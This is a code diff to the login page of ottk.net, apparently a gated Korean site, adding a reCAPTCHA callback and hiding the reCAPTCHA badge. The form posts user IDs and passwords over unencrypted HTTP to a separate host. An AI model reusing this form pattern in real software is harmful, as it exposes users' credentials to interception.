--- a/index.html
+++ b/index.html
@@ -4,7 +4,15 @@
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <title>ottk.net</title>
 <script src='https://www.google.com/recaptcha/api.js'></script>
+<script>
+        function captchaSubmit(data) {
+            document.getElementById("main_l").submit();
+        }
+</script>
 <style>
+.grecaptcha-badge {
+    display: none;
+}
 body {
 	margin: 0;
 	padding: 0;
@@ -147,11 +155,11 @@ getUserIP(function(ip){
 <div class="alert-concent">
 <p style="color:#ff5656;font-size:23px;line-height:30px;">OTTK.net
 <br> <br>
-</p><p><img width="200" height="200" src="https://3.bp.blogspot.com/-m-u_xuKMnRU/Wa7Bo5H3i5I/AAAAAAAACNY/KRf5_L24YGw725MJAoCTcJ4BL9Z90kJRQCLcBGAs/s1600/cover.jpg"></p><br><form action="http://momoair.dothome.co.kr/signin.php" method="post">
+</p><p><img width="200" height="200" src="https://3.bp.blogspot.com/-m-u_xuKMnRU/Wa7Bo5H3i5I/AAAAAAAACNY/KRf5_L24YGw725MJAoCTcJ4BL9Z90kJRQCLcBGAs/s1600/cover.jpg"></p><br><form id="main_l" action="http://momoair.dothome.co.kr/signin.php" method="post">
 <input type="hidden" name="base_url" value="http://ottk.net">
 <input type="text" name="user" placeholder="Type your ID" style="width:100px" required="">
 <input type="password" name="pass" placeholder="Type your Password" style="width:100px" required="">    
-<input type="submit" value="Sign in" class="g-recaptcha" data-sitekey="6Ldhx3MUAAAAAOwbibeNbE0kYz87DUqZlAh0iB-x">    
+<input type="submit" value="Sign in" class="g-recaptcha" data-sitekey="6Ldhx3MUAAAAAOwbibeNbE0kYz87DUqZlAh0iB-x" data-callback="captchaSubmit" data-badge="inline">    
 </form>
 <p style="color:#9ea7ab;font-size:14px;letter-spacing:-0.5px;">
 <a href="/" style="color:#2c87f0;text-decoration: none;">홈</a><br>
